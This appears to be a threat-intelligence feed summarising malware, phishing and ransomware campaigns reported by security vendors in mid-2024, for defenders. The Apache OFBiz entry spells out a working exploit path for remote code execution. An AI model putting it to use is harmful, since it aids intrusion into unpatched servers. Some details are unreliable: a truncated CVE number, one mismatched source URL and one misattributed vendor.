Source: https://www.cyberresilience.com/threatintel/apt-group-kimsuky-targets-university-researchers/

Intel Source:: CISA

Intel Name:: BlackSuit_Ransomware

Date of Scan:: 2024-08-08

Impact:: MEDIUM

Summary:: CISA researchers have updated an advisory about the Royal ransomware group to BlackSuit, and published it on August 7, 2024. This update has new tactics, techniques, and procedures (TTPs) methods in addition to indicators of compromise (IOCs) and detection techniques for BlackSuit ransomware. The advisory now refers to BlackSuit instead of Royal except when mentioning prior Royal operations. Additionally, key updates and new information are highlighted.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Intel Source:: SentinelOne

Intel Name:: A_Deep_Dive_into_DeathGrip_RaaS

Date of Scan:: 2024-08-08

Impact:: MEDIUM

Summary:: SentinelOne researchers have discovered a new RaaS group called DeathGrip, which emerged in June this year. DeathGrip provides advance ransomware tools to individuals with minimal technical skills to launch ransomware attacks. This group promotes their services through Telegram and other underground forums. As of now, DeathGrip does not have a central site for leaking or selling victim data. Their ransomware payloads are distributed as self-extracting WinRAR bundles that contains a dropper batch file and a JPG file with the DeathGrip logo. These ransomware files retrieve and run from a remote server, requiring high-level permissions to encrypt files and display ransomware notes.

Source: https://www.sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders/

Intel Source:: Seqrite

Intel Name:: Unmasking_Cronus_Ransomware

Date of Scan:: 2024-08-08

Impact:: MEDIUM

Summary:: Researchers at Seqrite Labs have discovered multiple global campaigns using fake PayPal lures to spread a new ransomware variant called Cronus. This ransomware is developed in PowerShell which runs directly in memory without writing any malicious content to disk. The attack begins with a phishing email containing a blank Word document which contains malicious embedded VBA macros. These macros downloaded a PowerShell-based loader, which then loaded the ransomware.

Source: https://www.seqrite.com/blog/unmasking-cronus-how-fake-paypal-documents-deliver-fileless-ransomware-via-powershell/

Intel Source:: Cyble

Intel Name:: Latrodectus_and_ACR_Stealer

Date of Scan:: 2024-08-08

Impact:: LOW

Summary:: CRIL researchers have identified a phishing website masquerading as an official Google Safety Centre page. This site entices users to download malware that purports to be Google Authenticator which includes Latrodectus and ACR Stealer. ACR Stealer collects sensitive information and sends it to a C2 server, while Latrodectus uses techniques to stay hidden on the victim's machine and continue malicious activities. When users download the authenticator from the malicious site it shows a fake error message but secretly installs the malware. Additionally, the attackers misuse Google Ads to spread links to these phishing sites.

Source: https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/

Intel Source:: CERT-AGID

Intel Name:: StrRat_Campaign

Date of Scan:: 2024-08-08

Impact:: LOW

Summary:: Researchers from CERT-AGID have discovered a malware named StrRat. It's a Remote Access Trojan (RAT) that is written in Java and mainly used for stealing information. StrRat allows attackers to control the compromised machine remotely and has features for stealing passwords, recording keystrokes, and adding more plugins to extend its capabilities.

Source: https://cert-agid.gov.it/news/nuova-campagna-italiana-strrat-disponibile-una-ricetta-cyberchef-per-decodificare-il-malware/

Intel Source:: WIZ Blog

Intel Name:: Emerging_Phishing_campaign_targeting_AWS_accounts

Date of Scan:: 2024-08-08

Impact:: MEDIUM

Summary:: Researchers at Wiz have discovered a phishing campaign where attackers aim to steal AWS login credentials. The phishing email contains a PNG image which takes the user to a malicious website. The email is sent by using Amazon SES that shows attackers are using an AWS account. The PDF file has an Invoice Summary link that redirects users through several websites eventually leading to a fake AWS login page to steal credentials. This page contains JavaScript script which might be controlled by the attackers or linked to the same AWS account used for sending the phishing emails.

Source: https://www.wiz.io/blog/emerging-phishing-campaign-targeting-aws-accounts

Intel Source:: NSFOCUS

Intel Name:: A_New_APT_Group_Actor240524

Date of Scan:: 2024-08-08

Impact:: MEDIUM

Summary:: Researchers from NSFOCUS have discovered an attack campaign targeting Azerbaijan and Israel. After analyzing the tactics, attack vectors, weapons, and infrastructure, NSL concluded that the attack characteristics are unrelated to known APT groups. As a result, NSL links this campaign to a new APT organization, Actor240524, and refers to the new Trojan programs as ABCloader and ABCsync.

Source: https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/

Intel Source:: Securelist

Intel Name:: CMoon_Malware_Spreads_via_Hacked_Websites

Date of Scan:: 2024-08-08

Impact:: LOW

Summary:: Researchers from Kaspersky Lab have noticed a new worm identified as CMoon. This worm can download private and payment information from infected devices, as well as other software, and perform DDoS attacks on certain Internet resources. The malware was spread via a legal website for a company that provides gasification and supply services to a city in the Russian Federation.

Source: https://securelist.ru/how-the-cmoon-worm-collects-data/109988/

Intel Source:: Linkedin

Intel Name:: Lockbit_Ransomware_Stores_Mimikaz_on_Chinese_Infra

Date of Scan:: 2024-08-07

Impact:: HIGH

Summary:: Lockbit ransomware has been detected using a Chinese infrastructure to deploy Mimikatz, it's a tool for extracting sensitive credentials, hashes and Kerberos tickets from Windows memory. The compromised systems, running Windows 8.1 or Windows Server 2012 R2 with Apache/2.4.56 and MariaDB, were found pulling Mimikatz during the infection process. The infrastructure involved, AS45090, is associated with multiple malicious tools, including Cobalt Strike, Supershell, Mozi, and BlackMoon.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-mimikatz-lockbit-activity-7226180119126495233-ZJa-/?utm_source=share&utm_medium=member_ios

Intel Source:: Symantec

Intel Name:: Unmasking_GoGra_Backdoor

Date of Scan:: 2024-08-07

Impact:: LOW

Summary:: Researchers from Symantec have observed that the GoGra Backdoor uses the Microsoft Graph API to interact with a C&C server hosted on Microsoft mail services. GoGra is configured to read messages from an Outlook username "FNU LNU" with subjects line starts with the word "Input." It decrypts the message contents using the AES-256 algorithm. GoGra executes commands via the cmd.exe input stream and supports the "cd" command which changes the active directory. After the execution of a command, it encrypts the output and sends it to the same user with the subject "Output."

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/cloud-espionage-attacks

Intel Source:: Medium (Maordayanofficial)

Intel Name:: RHADAMANTHYS_Stealer_Targeting_Israeli_Users

Date of Scan:: 2024-08-07

Impact:: LOW

Summary:: Researchers have uncovered a campaign where the RHADAMANTHYS stealer is targeting Israeli users. This stealer first emerged in 2023, developed by Russian-speaking hackers and sold as Malware-as-a-Service on exclusive forums. The attack begins with an email in Hebrew that masquerades as communication from Calcalist and Mako, Israeli business newspapers and websites. The email has an urgent subject about copyright violations and uses professional language to appear legitimate. It demands action within 24 hours and includes an attachment disguised as important legal documents. The email also includes a locked RAR archive to avoid detection.

Source: https://maordayanofficial.medium.com/rhadamanthys-an-in-depth-analysis-of-a-sophisticated-stealer-targeting-israeli-users-330fbfd68f3b

Intel Source:: Sophos

Intel Name:: Mimic_ransomware_campaign_against_Indian_Entities

Date of Scan:: 2024-08-07

Impact:: LOW

Summary:: Sophos researchers have identified a new threat cluster called STAC6451 that targets exposed Microsoft SQL Server databases of large Indian organizations across various sectors to deploy ransomware. These attackers exploit SQL Servers using the default port 1433 to gain unauthorized access and enable remote code execution. They use the Bulk Copy Program (BCP) utility to install malicious tools, including Cobalt Strike Beacons and Mimic ransomware.

Source: https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/

Intel Source:: Acronis

Intel Name:: Diving_Deep_into_Zola_Ransomware

Date of Scan:: 2024-08-07

Impact:: MEDIUM

Summary:: Researchers from Acronis have discovered that the Zola ransomware is a more recent version of the Proton ransomware family, which was initially discovered in March 2023 and is well-known for its constant evolution and rebranding. In addition to using a variety of hacking techniques for memory token stealing, network scanning, and privilege escalation, Zola has a kill switch that ends the process if it detects a Persian keyboard layout, which may indicate where the infection originated. It encrypts files with a ransom in return for their decryption, first using a combination of the AES and ECC algorithms and then ChaCha20. Moreover, Zola tries to obstruct recovery by erasing shadow copies and filling up junk data on the disk.

Source: https://www.acronis.com/en-us/cyber-protection-center/posts/zola-ransomware-the-many-faces-of-the-proton-family/

Intel Source:: Linkedin

Intel Name:: An_Overview_of_Lynx_Ransomware

Date of Scan:: 2024-08-07

Impact:: MEDIUM

Summary:: Lynx Ransomware is a Windows platform malware that has been active since mid-July 2024, and its data leak website displays the names of American and British victims. The ransomware renames all the encrypted files with .lynx extension. It is written in Visual C++ using AES and Curve25519 for encryption. Importantly, it has also incorporated BluTeal Dropper which is an old tool observed in 2017 and other known mutexes like WERReportingForProcess2644 or AmiProviderMutex_InventoryApplicationFile. The group data leak sites, accessible on both the Dark and Surface Web, utilize nginx/1.18.0 and ReactJS for their frontend and the identity used for communication is likely Indonesian.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_lynx-lynxransomware-ransomware-activity-7224004702676377600-0EHr/?utm_source=share&utm_medium=member_ios

Intel Source:: TeamCymru

Intel Name:: Quad7_botnet_and_its_infrastructure

Date of Scan:: 2024-08-07

Impact:: LOW

Summary:: Researchers from Team Cymru have discovered that the Quad7 threat operators have expanded their activities to include a new group of bots using port 63256, primarily affecting ASUS routers. They identified 12,783 active bots from both the 7777 and 63256 botnets. The botnet uses seven key management IPs to control the devices and employs SOCKS5 proxies for attacks on Microsoft 365 accounts. While the 7777 botnets primarily target TP-Link routers and IP cameras, the 63256 botnet focuses on ASUS routers.

Source: https://www.team-cymru.com/post/botnet-7777-are-you-betting-on-a-compromised-router

Intel Source:: PaloAlto

Intel Name:: Google_SaaS_Phishing_Campaign

Date of Scan:: 2024-08-06

Impact:: MEDIUM

Summary:: Researchers from PaloAlto have identified a phishing campaign that takes advantage of legitimate SaaS platforms, specifically Google Drawings and Google Slides, to conduct phishing attacks. The attackers create documents or presentations with these services, embedding malicious links that redirect victims to phishing pages designed to steal sensitive information. These phishing pages are crafted to mimic legitimate services, thereby deceiving users into entering their credentials or personal information, which are then captured by the attackers.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-05-Google-drawings-and-slides-abuse-for-phishing.txt

Intel Source:: CERT-AGID

Intel Name:: Vidar_Malware_Returns_with_Malspam_Campaign

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: Researchers from CERT-AGID have discovered a widespread spam campaign spreading Vidar malware through Certified Email (PEC) mailboxes. Vidar is an infostealer malware capable of stealing passwords, cookies, credit card information, digital wallets, and login credentials once it infects a system. The attack happened overnight on August 5th and 6th, targeted many PEC users using a known template. These malicious emails contain a link that downloads a JavaScript file which then runs a PowerShell script.

Source: https://cert-agid.gov.it/news/ritorna-vidar-in-italia-con-una-campagna-di-malspam-tramite-pec/

Intel Source:: LevelBlue Labs

Intel Name:: Hackers_Hijack_Anti_Virus_Software

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: Researchers from Level Blue Labs have identified that cybercriminals are now using real anti-virus software to perform hidden attacks. They have created a tool called SbaProxy which looks real anti-virus software but connects to a command-and-control server for malicious activities. This tool is being distributed in multiple formats, including DLLs, EXEs, PowerShell scripts and is hard to detect because it uses actual anti-virus components and valid certificates. This sneaky tool can be used for various malicious activities and potentially be sold for financial gain.

Source: https://cybersecurity.att.com/blogs/labs-research/hijacked-how-cybercriminals-are-turning-anti-virus-software-against-you

Intel Source:: Reason Labs

Intel Name:: Browser_Hijack_Trojan_Campaign

Date of Scan:: 2024-08-06

Impact:: MEDIUM

Summary:: Researchers at Reason Labs have identified a very sophisticated attack involving a polymorphic extension trojan malware targeting users of popular web browsers such as Google Chrome or Microsoft Edge. This malware has been operating since 2017 through fake websites pretending to be legitimate download sites for software like Roblox FPS Unlocker or VLC Media Player. Once downloaded, the malware installs itself as an unremovable browser extension that displaces search queries and steals sensitive information.

Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign

Intel Source:: Sonicwall

Intel Name:: Beware_of_Fake_WinRar_Websites

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: SonicWall researchers have observed a fake website that appears to be distributing WinRar, a data compression, encryption, and archiving utility for Windows, has also been discovered to be hosting malware. This fraudulent website employs typosquatting, mimics the official website closely, and attacks on internet users who might accidentally type the URL of this well-known archiving program. The initial malware then leads to a slew of malicious components hosted on GitHub, which include ransomware, cryptominer and infostealer.

Source: https://blog.sonicwall.com/en-us/2024/08/beware-of-fake-winrar-websites-malware-hosted-on-github/

Intel Source:: Rewterz

Intel Name:: Mispadu_Banking_Trojan

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: Researchers from Rewterz have uncovered spam campaigns spreading the URSA/Mispadu banking trojan which steals credentials from user’s machines. This malware targets systems with Spanish and Portuguese languages and affecting users in Mexico, Spain, Portugal, and nearby regions. The attack uses spam emails about overdue invoices to trick users into downloading a ZIP file from malicious links. This file contains an installer with a VBScript that hides the malware through layers of obfuscation. If the script detects a virtual environment, it terminates its execution.

Source: https://www.rewterz.com/threat-advisory/mispadu-banking-trojan-active-iocs

Intel Source:: Elastic Security Labs

Intel Name:: Uncovering_SAC_and_SmartScreen_Issues

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: Researchers from Elastic Security Labs have observed several fundamental design weaknesses in Smart App Control and SmartScreen. These vulnerabilities can allow for initial access with no security warnings and with minimal user interaction. Smart App Control is a cloud-powered security feature introduced by Microsoft in Windows 11, designed to block malicious, untrusted, and potentially unwanted apps from running on the system.

Source: https://www.elastic.co/security-labs/dismantling-smart-app-control

Intel Source:: Quorum Cyber

Intel Name:: New_SharpRhino_Malware

Date of Scan:: 2024-08-06

Impact:: MEDIUM

Summary:: A new variation of Remote Access Trojan (RAT) has been detected and investigated by Quorum Cyber researchers referred to as SharpRhino, related to the Hunters International ransomware group. Its activities have been traced back to October 2023 and it is believed that the group’s origins can be traced back to Russian based Hive ransomware group which collapsed. SharpRhino is an advanced C# malware delivered via a typosquatting domain masquerading as Angry IP Scanner legitimate software. As soon as this malware is executed, it sets up persistence on the infected machine and allows remote control for the attacker.

Source: https://www.quorumcyber.com/insights/sharprhino-new-hunters-international-rat-identified-by-quorum-cyber/

Intel Source:: NCSC

Intel Name:: North_Korean_Hackers_Exploit_VPN_Flaws

Date of Scan:: 2024-08-06

Impact:: MEDIUM

Summary:: South Korea's National Cyber Security Center (NCSC) has reported that North Korean hackers, specifically the groups Kimsuky (APT43) and Andariel (APT45), have exploited vulnerabilities in a VPN software update to deploy malware and breach networks. This attack is linked to North Korea's recent initiative to modernize industrial factories, with the aim of stealing trade secrets from South Korea. The NCSC notes the unprecedented coordination of these groups targeting the same sector simultaneously for strategic objectives.

Source: https://www.documentcloud.org/documents/25031724-240805_saibeoanbo_jeongbogongdongce_habdongboangweongomun

Intel Source:: Rewterz

Intel Name:: MeterPreter_Malware

Date of Scan:: 2024-08-06

Impact:: LOW

Summary:: Researchers at Rewterz have identified a malware called Meterpreter that allows attackers to take remotely control of compromised machines. This malware inserts itself into existing processes rather than creating new ones. Attackers can use Meterpreter to send and receive files, execute commands, take screenshots and log keystrokes. It is commonly spread through infected email attachments, malicious ads, and social engineering. Additionally, attackers can use Meterpreter to deliver more malware such as ransomware which encrypts data until a ransom is paid. The primary risks associated with Meterpreter include identity theft, banking information and password theft.

Source: https://www.rewterz.com/threat-advisory/meterpreter-malware-active-iocs-3

Intel Source:: Aquasec

Intel Name:: A_Novel_Discord_DDoS_Campaign_Called_Panamorfi

Date of Scan:: 2024-08-05

Impact:: LOW

Summary:: Researchers at Aqua Nautilus have identified a new Distributed Denial of Service (DDoS) campaign named Panamorfi. Also, this attack leverages a Java-based Minecraft DDoS package called Mineping. The campaign has so far been observed to launch the DDoS attacks using misconfigured Jupyter notebooks.

Source: https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/

Intel Source:: ISC.SANS

Intel Name:: New_VBS_Obfuscation_Technique_For_Remcos_RAT

Date of Scan:: 2024-08-05

Impact:: LOW

Summary:: The Remcos RAT in a recent VBS file analysis brought about a novel obfuscation technique where numerous repeated functions and comments were used to mask the real payload. Consequently, with so much superfluous code, it made very difficult for anyone scanning through the script to locate the dangerous payload. Even though the script had repetitions, it still executed without errors possibly because its function definitions were overwritten by Windows Script Host earlier on. The duplicate lines, however, were deleted so that a clear payload could be seen among all these hiding techniques for ease in understanding.

Source: https://isc.sans.edu/diary/rss/31144

Intel Source:: Hunt.IO

Intel Name:: Quasar_RAT

Date of Scan:: 2024-08-05

Impact:: LOW

Summary:: The Quasar RAT is an open-source remote access trojan (RAT) that targets Windows devices. Cybercriminals use it to gain unauthorized remote control of compromised machines, spy on their users, steal their data, and run other software. The discovery of Quasar RAT dates back to about 2015. It soon acquired popularity in the cybersecurity field since it was open source, allowing anyone to alter or adapt it to their specific requirements.

Source: https://x.com/huntio/status/1820061868515549464?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Linkedin

Intel Name:: Exposing_the_Dark_Angels_Ransomware_Group

Date of Scan:: 2024-08-05

Impact:: LOW

Summary:: A ransomware group called Dark Angels, first observed in May 2022, became widely known after data leaks were discovered in February 2023. The group has targeted 13 victims, 9 of them are based in the United States, focusing on sensitive companies in different industries whose activities concern manufacturing, building, transport logistics and trade services as well as information technology. They have claimed that they use advanced ransomware but have been linked to Babuk Ransomware and RagnarLocker Group where code analysis indicates elements of HelloKitty.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_darkangels-ransomware-malware-activity-7225381761453584384-50wD/

Intel Source:: Palo Alto

Intel Name:: Fighting_Ursa_Luring_Targets_With_Car_for_Sale

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Palo Alto researchers have discovered a campaign where Russian threat actor Fighting Ursa (also known as APT28, Fancy Bear, and Sofacy) is targeting diplomats with a fake car advertisement to spread HeadLace malware. They use a legitimate service called Webhook.site to host a malicious URL that deliver malicious HTML. This HTML check if the visitor's computer is Windows-based then create zip file otherwise redirect to a decoy image on ImgBB, another legitimate service. The decoy is an ad for Audi Q7 as "Diplomatic Car for Sale," with fake contact details to appear credible. This campaign highlights Fighting Ursa's ongoing use of successful tactics, even borrowing them from other groups.

Source: https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/

Intel Source:: DATADOG

Intel Name:: Attacker_Linked_With_DPRK_Leveraging_NPM

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: On 7th July, 2024, the npm user nagasiren978 uploaded two malicious packages harthat-hash and harthat-api to the npm registry. These packages contain code that installs additional malware from a command and control (C2) server, which is designed for Windows systems. The tactics and infrastructure used in this attack are very similar to those of MOONSTONE SLEET threat actor associated with North Korea. Also, it is known as Stressed Pungsan cluster aligning with the DPRK’s national breed, the Pungsan dog.

Source: https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/

Intel Source:: Elastic Security Labs

Intel Name:: Analyzing_BITSLOTH_Backdoor

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Researchers at Elastic Security Labs have discovered a Windows backdoor (BITSLOTH) that exploits the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group identified as REF8747. The most recent iteration of this backdoor at the time of publication has 35 handler functions including keylogging and screen capture capabilities. In addition, BITSLOTH includes a variety of capabilities for discovery, enumeration, and command-line execution.

Source: https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth

Intel Source:: Checkmarx

Intel Name:: Malicious_Python_Packages_Targeting_Crypto_Users

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Researchers from Checkmarx have observed that multiple malicious Python packages are being uploaded to PyPI, targeting cryptocurrency users who utilize Raydium and Solana. The attacker used StackExchange as a primary vector to lure users to their malicious package. Additionally, the multi-stage malware exfiltrated extensive sensitive data and assisted in the theft of victims' cryptocurrency wallets.

Source: https://checkmarx.com/blog/stackexchange-abused-to-spread-malicious-python-package-that-drains-victims-crypto-wallets/

Intel Source:: Volexity

Intel Name:: StormBamboo_Hacks_ISP_to_Exploit_Software_Updates

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Researchers from Volexity have discovered that the threat actor StormBamboo, also known as Evasive Panda, compromises multiple systems by tampering with DNS responses at the ISP level. This affects both macOS and Windows systems across various organizations. StormBamboo alters DNS responses for domains linked to automatic software updates that do not require digital signatures. As a result, the update requests are redirected to their own malicious servers and downloads malware like MACMA and POCOSTICK.

Source: https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/

Intel Source:: BI Zone

Intel Name:: Bloody_Wolf_Target_Kazakhstan_with_STRRAT

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Researchers at BI Zone have identified the activity of Bloody Wolf which is targeting organizations in Kazakhstan by using STRRAT malware also known as Strigoi Master. The attackers send phishing emails on behalf of Ministry of Finance of Kazakhstan and other official agencies claim to be non-compliance notices which include links to malicious JAR files. These links redirects to a legitimate government website that encourages Java installation for accessing the e-government portal.

Source: https://bi.zone/eng/expertise/blog/bloody-wolf-primenyaet-kommercheskoe-vpo-strrat-protiv-organizatsiy-v-kazakhstane/

Intel Source:: Coinmonks

Intel Name:: Mint_Stealer

Date of Scan:: 2024-08-02

Impact:: LOW

Summary:: Mint Stealer is a Python stealer that typically stays in the background and doesn't attract much attention. After infecting a victim's machine, it can retrieve confidential data from that system.

Source: https://medium.com/coinmonks/mint-stealer-running-by-a-bulletproof-hoster-0983df47a411

Intel Source:: Securelist

Intel Name:: How_Cybercriminals_Acquire_and_Deploy_Ransomware

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Securelist researchers have analyzed the activities of ransomware, specialists in cybercrime usually do not create their own ransomware samples, but rather get them from various sources. They can buy samples on the dark web, make alliances with other groups, or use leaked versions of ransomware. These criminals can easily target victims and spread malware using traditional tools and modified ransomware samples.

Source: https://securelist.com/sexi-key-group-mallox-ransomware/113183/

Intel Source:: Push Security

Intel Name:: How_AitM_Phishing_Kits_Evade_Detection

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Push Security researchers have explored the NakedPages AitM phishing toolkit and its tactics of avoiding detection. As MFA becomes increasingly widespread, cases of AitM phishing are going up with NakedPages becoming a classic example. The toolkit uses different tactics such as employing real SaaS services to obscure malicious operations. This case study shows how advanced the design of AitM toolkits often is at evading threat detection, many times being very quick from the victim’s point of view and unfolding flawlessly.

Source: https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/

Intel Source:: ForcePoint

Intel Name:: Banking_Trojans_Targeting_Global_Banks

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Researchers from Forcepoint have observed that banking trojans are quickly evolving and impacting large banks worldwide. This malware is distributed via geo-fenced URLs embedded in the email, with the main motive being to steal the credentials from the victim's system by infecting the victim's system with process injection using the AutoIt script and tools.

Source: https://www.forcepoint.com/blog/x-labs/malware-lurking-behind-secureserver-net-urls

Intel Source:: Proofpoint

Intel Name:: Hackers_Abusing_Cloudflare_Tunnels_to_Deliver_RATs

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Researchers at Proofpoint have noticed a surge in cybercriminal threat activity that uses Cloudflare Tunnels to spread malware. In particular, the activity takes use of TryCloudflare's functionality, which lets an attacker establish a one-time tunnel without registering. Similar to how users would use a virtual private network (VPN) or secure shell (SSH) protocol, tunnels allow you to remotely access files and resources that are not on the user's local network.

Source: https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats

Intel Source:: Hunt.IO

Intel Name:: MacOS_Malware_Pose_as_Unarchiver_App

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Researchers at Push Security have observed during routine research, that a fraudulent site mimicking the legitimate theunarchiver[.]com was discovered. The site is known as tneunarchiver[.]com and closely replicates the real one but features a deceptive download button. Upon clicking the button, unsuspecting users download a malicious disk image named TheUnarchiver.dmg, pretending as the real application. The Unarchiver is a trusted tool for extracting various archive formats on Mac, it's a RAR extractor, allows to unzip files, and works with dozens of other formats.

Source: https://hunt.io/blog/macos-malware-impersonates-the-unarchiver-app-to-steal-user-data

Intel Source:: Trend Micro

Intel Name:: Social_Media_Malvertising_Campaign

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a campaign where threat actors are hijacking social media pages and renaming them as legitimate AI photo editor. They post fake links on these pages and promote them through paid ads. The scammers send spam messages with phishing links to steal admin login details, which lead to fake account to trick users into providing their login information. Once they control the page, they install ITarian software that executes malware called Lumma Stealer which steals sensitive data such as cryptocurrency wallet files, browser data, and password manager databases.

Source: https://www.trendmicro.com/en_us/research/24/h/malvertising-campaign-fake-ai-editor-website-credential-theft.html

Intel Source:: Cisco Talos

Intel Name:: APT_41_Target_Taiwanese_government_Institute

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Cisco Talos researchers have discovered a campaign where threat actor compromised a Taiwanese government research institute by using ShadowPad malware, Cobalt Strike, and other customized tools. This attack is attributed to a Chinese hacking group called APT41 based on their tactics and tools. In this campaign, the attacker exploits the outdated Microsoft Office IME vulnerability to load the ShadowPad malware and uses a unique Cobalt Strike loader to evade Windows Defender. They create a special loader to exploit a vulnerability (CVE-2018-0824) for local privilege access.

Source: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/

Intel Source:: ISC.SANS

Intel Name:: A_Rise_in_Attacks_Against_Apache_OFBiz

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Recently, in May, a crucial security vulnerability was addressed by the Java-based ERP framework of the Apache Foundation called OFBiz (CVE-2024-321). This defect, which affected versions before 18.12.13, was a path transversal problem capable of causing remote command execution. All that was needed for exploitation was simple: exploiters added a semicolon to a general URL like /webtools/control/forgotPassword;/ProgramExport. Notably, “forgotPassword” is publicly accessible while “ProgramExport” permits arbitrary program code executions. Despite requiring a POST request, it can be satisfied by injecting a URL parameter since there has been some recent notice of this form of attack being active.

Source: https://isc.sans.edu/diary/Increased+Activity+Against+Apache+OFBiz+CVE202432113/31132/

Intel Source:: PaloAlto

Intel Name:: Surge_in_Tech_Support_Scams

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: Researchers from PaloAlto have identified a significant rise in the number of hits on fake webpages made to make users think their systems have been hacked and so calling fake tech support numbers since June 2024. Scams mainly aim at Windows users, but macOS is also affected by them. Typically, these scam pages show phone numbers from Japan and USA.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-31-increase-of-tech-support-scam-URLs.txt

Intel Source:: Cisco Talos

Intel Name:: NetSupport_RAT_Campaign

Date of Scan:: 2024-08-01

Impact:: LOW

Summary:: In 2023, a NetSupport RAT campaign was detected by security vendors that employed fake browser updates from hijacked websites to distribute a stager which conducts a PowerShell-based installation of the NetSupport manager agent. Obfuscation techniques were advanced in its JavaScript payload by January, 2024 and changes have been seen in the paths used to install agents. An in-depth analysis has been conducted by Cisco Talos who identified various obfuscation and evasion techniques used throughout the campaign and created detection for users’ safety.

Source: https://blog.talosintelligence.com/detecting-evolving-threats-netsupport-rat/

Intel Source:: Malwarebytes

Intel Name:: Google_Authenticator_Users_Targeted_by_Fake_Ad

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: Researchers from Malwarebytes have observed that a Google ad is tricking users into visiting a decoy website and targeting Google Authenticator users with a fake ad. An unknown individual impersonated Google to successfully push malware disguised as a legitimate Google product.

Source: https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator

Intel Source:: Fortinet

Intel Name:: Malicious_Packages_Hidden_in_PyPI

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: Researchers from FortiGuard have discovered a malicious PyPI package which can affect any platform using PyPI packages. This malicious package is designed to steal sensitive information like passwords and cookies from web browsers. The package contains a URL that downloads various files, including an executable file packed with PyInstaller. This can lead to unauthorized access to user accounts and the theft of personal data.

Source: https://www.fortinet.com/blog/threat-research/malicious-packages-hidden-in-pypl

Intel Source:: ESET

Intel Name:: Phishing_Continues_via_ModiLoader

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: ESET researchers have observed that in May 2024, phishing attacks in Poland, Romania, as well as Italy, had an interesting twist where they switched from AceCryptor to ModiLoader. ESET also spotted nine important ModiLoader attempts to phish small and medium scale businesses and seven of them were in Poland. The malware that was spread by ModiLoader consists of Rescoms, Agent Tesla, and Formbook. Attackers leveraged compromised email accounts and company servers to distribute malicious emails, host malware, and gather stolen data.

Source: https://www.welivesecurity.com/en/eset-research/phishing-targeting-polish-smbs-continues-modiloader/

Intel Source:: Any.Run

Intel Name:: DeerStealer_Campaign

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: Researchers at AnyRun discovered a malware campaign called DeerStealer. The malware is spread through fake Google Authenticator websites that look like real Google pages. When users click the download button, their information (IP address and country) is sent to a Telegram bot named Tuk-tuk and the malware is downloaded from GitHub. The downloaded file launches the final malicious program which runs directly in memory without being saved on the computer.

Source: https://any.run/cybersecurity-blog/deerstealer-campaign-analysis/

Intel Source:: Securonix

Intel Name:: DEVPOPPER_Campaign

Date of Scan:: 2024-07-31

Impact:: MEDIUM

Summary:: Securonix threat researchers have identified a malware campaign called DEV#POPPER which linked to North Korea targets software developers. In this campaign, attackers behave like a job interviewer and send candidates a ZIP file for a coding assignment. When the user runs the files, the malware identifies the user’s operating system and contacts a remote server to steal data. This campaign affects victims in South Korea, North America, Europe, and the Middle East, targeting Windows, Linux, and macOS systems. The malware is hidden among legitimate files, making it hard to detect.

Source: https://www.securonix.com/blog/research-update-threat-actors-behind-the-devpopper-campaign-have-retooled-and-are-continuing-to-target-software-developers-via-social-engineering/

Intel Source:: Cyble

Intel Name:: Exploitation_of_Sora_AI_to_Spread_Malware

Date of Scan:: 2024-07-31

Impact:: LOW

